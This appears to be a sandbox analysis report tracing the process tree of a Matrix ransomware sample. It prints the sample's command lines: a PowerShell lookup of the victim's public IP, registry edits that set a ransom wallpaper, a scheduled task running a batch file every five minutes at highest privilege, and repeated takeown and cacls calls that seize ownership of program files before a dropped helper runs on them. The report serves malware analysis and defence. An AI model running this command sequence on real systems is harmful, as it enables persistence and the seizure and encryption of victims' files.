The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWiBQzcf.exe"2⤵PID:2936
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWiBQzcf.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWiBQzcf.exe" -n2⤵
- Executes dropped EXE
PID:2732
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\2AtfLWqd.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Mf8QLzo3.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Mf8QLzo3.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1576
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1492
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Matrix Ransomware
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\jGLSZ8VD.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\jGLSZ8VD.vbs"3⤵PID:828
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\jBIuzzaK.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:752
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\jBIuzzaK.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:5580
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:3164
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:4708
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:2776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵PID:2628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Users\Admin\AppData\Local\Temp\D22bUU4y64.exeD22bUU4y.exe -accepteula "SignHere.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4084
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:2708 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:4424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:3688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:4236 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2132
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:5736 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:1068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵
- Modifies file permissions
PID:2364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3032
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:5172 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:5200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:5220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:936 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2168
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:556 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:5292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:5312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:5340 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:5348
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:4312 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:5484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵
- Modifies file permissions
PID:5480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:5448 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:5492
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:5544 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:2456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:2364 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:2952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Loads dropped DLL
PID:5136 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:5160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:5148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:5196 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:5200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1992 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:2512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:5584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:1472
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵
- Loads dropped DLL
PID:4904 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:3212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MahjongMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MahjongMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:2200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵
- Loads dropped DLL
PID:1136 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:2716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵
- Modifies file permissions
PID:2984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "cryptocme2.sig" -nobanner3⤵
- Loads dropped DLL
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "cryptocme2.sig" -nobanner4⤵
- Executes dropped EXE
PID:2476
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵
- Loads dropped DLL
PID:1608 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:1968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵
- Modifies file permissions
PID:3112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "pmd.cer" -nobanner3⤵
- Loads dropped DLL
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "pmd.cer" -nobanner4⤵
- Executes dropped EXE
PID:2276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵
- Loads dropped DLL
PID:1672 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:2712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵PID:2484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "email_initiator.gif" -nobanner3⤵
- Loads dropped DLL
PID:2696 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "email_initiator.gif" -nobanner4⤵
- Executes dropped EXE
PID:2452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵
- Loads dropped DLL
PID:3196 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:3944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:3240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "pdf.gif" -nobanner3⤵
- Loads dropped DLL
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "pdf.gif" -nobanner4⤵
- Executes dropped EXE
PID:2168
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵
- Loads dropped DLL
PID:3252 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:3364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:3428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "server_issue.gif" -nobanner3⤵
- Loads dropped DLL
PID:3424 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "server_issue.gif" -nobanner4⤵
- Executes dropped EXE
PID:3496
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵
- Loads dropped DLL
PID:3504 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:3012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:3004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵
- Loads dropped DLL
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵
- Executes dropped EXE
PID:1692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵
- Loads dropped DLL
PID:1676 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:3120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:3140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd.otf" -nobanner3⤵
- Loads dropped DLL
PID:3148 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CourierStd.otf" -nobanner4⤵
- Executes dropped EXE
PID:2332
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵
- Loads dropped DLL
PID:280 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:3176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "zx______.pfm" -nobanner3⤵
- Loads dropped DLL
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "zx______.pfm" -nobanner4⤵
- Executes dropped EXE
PID:5676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵
- Loads dropped DLL
PID:4480 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:4424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵
- Modifies file permissions
PID:4028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵
- Loads dropped DLL
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵
- Executes dropped EXE
PID:3360
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵
- Loads dropped DLL
PID:4580 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:4692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:4732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can32.clx" -nobanner3⤵
- Loads dropped DLL
PID:4736 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "can32.clx" -nobanner4⤵
- Executes dropped EXE
PID:4744
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵
- Loads dropped DLL
PID:5740 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:3568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵
- Modifies file permissions
PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "symbol.txt" -nobanner3⤵
- Loads dropped DLL
PID:4508 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "symbol.txt" -nobanner4⤵
- Executes dropped EXE
PID:4504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4436
-
-
-
